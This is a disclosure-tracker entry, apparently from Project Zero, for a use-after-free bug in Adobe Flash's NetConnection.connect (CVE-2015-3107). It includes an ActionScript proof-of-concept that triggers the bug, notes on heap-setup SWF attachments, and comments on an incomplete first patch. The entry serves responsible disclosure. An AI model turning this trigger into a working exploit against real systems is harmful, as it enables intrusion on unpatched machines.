Status: Fixed
Closed: Aug 2015
Use-after-free in NetConnection.connect
Project Member Reported by natashenka@google.com, Apr 28 2015
If the fpadInfo property of a NetConnection object is a SharedObject, a use-after-free occurs when the property is deleted. A proof-of-concept is as follows:

var s = SharedObject.getLocal("test");
ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var q = {myprop : "natalie", myprop2 : "test"};
s.data.fpadInfo = q;
s.flush();
var n = new NetConnection();
ASnative(2100, 200)(s.data);
n.connect.call(s.data, "");
trace(s.data.fpadInfo);
s = 1;

// GC happens here

setInterval(f, 1000);

function f() {
    ASnative(252, 1).call(q); // Array push
    delete q.myprop;
}

A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
Attachments: loadswf.swf (1.5 KB), shareddelete.swf (1.1 KB), shareddelete.fla (5.2 KB), loadswf.as (1.9 KB)
Comment 1 by cevans@google.com, Apr 30 2015
Labels: -Reported-2015-Apr-28 Reported-2015-Apr-30
Comment 2 by cevans@google.com, May 1 2015
Labels: Id-3630
Comment 3 by cevans@google.com, Jun 4 2015
Labels: CVE-2015-3107
Project Member Comment 5 by natashenka@google.com, Jun 9 2015
Status: Accepted
This issue is not fixed, despite being in the bulletin. I've attached an updated PoC that causes a crash in updated Flash. Only the shareddelete.swf needs to be replaced, otherwise follow the instructions above.
Attachments: shareddelete.swf (1.1 KB), shareddelete.fla (5.3 KB)
Project Member Comment 6 by natashenka@google.com, Aug 11 2015
Labels: Deadline-Exceeded Deadline-Grace
Status: Fixed
Project Member Comment 7 by natashenka@google.com, Aug 18 2015
Labels: -Restrict-View-Commit
Fixed for reals in the August update.